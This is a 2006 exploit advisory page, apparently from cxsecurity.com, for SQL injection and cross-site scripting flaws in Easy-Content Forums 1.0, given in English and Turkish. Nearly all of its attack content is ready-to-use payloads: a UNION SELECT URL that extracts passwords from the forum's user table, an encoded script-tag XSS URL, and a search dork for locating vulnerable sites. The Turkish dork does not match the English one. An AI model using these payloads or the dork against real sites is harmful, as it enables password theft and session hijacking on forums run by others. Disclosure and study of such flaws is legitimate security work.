Bug: Easy-Content Forums 1.0 Multiple [SQL/XSS] Vulnerabilities ( Ascii Version )

Search:
WLB2

Easy-Content Forums 1.0 Multiple [SQL/XSS] Vulnerabilities

Published
Credit
Risk
2006.06.01
ajannhwt hotmail com
Medium
CWE
CVE
Local
Remote
CWE-79
CVE-2006-2697
CVE-2006-2696
No
Yes

ENGLISH

# Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities

# Dork : "Copyright 2004 easy-content forums"

# Author : ajann

# Exploit;

SQL INJECTİON--------------------------------------------------------

### http://[target]/[path]/userview.asp?startletter=SQL TEXT

### http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x

Example:

http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------

### http://[target]/[path]/userview.asp?startletter=xss TEXT

### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT

Example:

http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ea
lert%28%27X%27%29%3B%3C%2Fscript%3E

%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X

# ajann,Turkey

TURKISH

# Başlık : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities

# Sözcük[Arama] : "powered by phpmydirectory"

# Açığı Bulan : ajann

# Açık bulunan dosyalar;

SQL INJECTİON--------------------------------------------------------

### http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ

### http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=Değişken

Örnek:

http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------

### http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ

### http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ

Örnek:

http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ea
lert%28%27X%27%29%3B%3C%2Fscript%3E

%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyarısı
çıkarıcaktır.

Açıklama:

userview.asp , topics.asp dosyalarında bulunan filtreleme eksikliği nedeniyle sql sorgu
çalıştırılabilmektedir.

userview.asp , topics.asp dosyalarında bulunan filtreleme eksikliği nedeniyle xss kodları
çalışabilmektedir.

# ajann,Turkiye

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version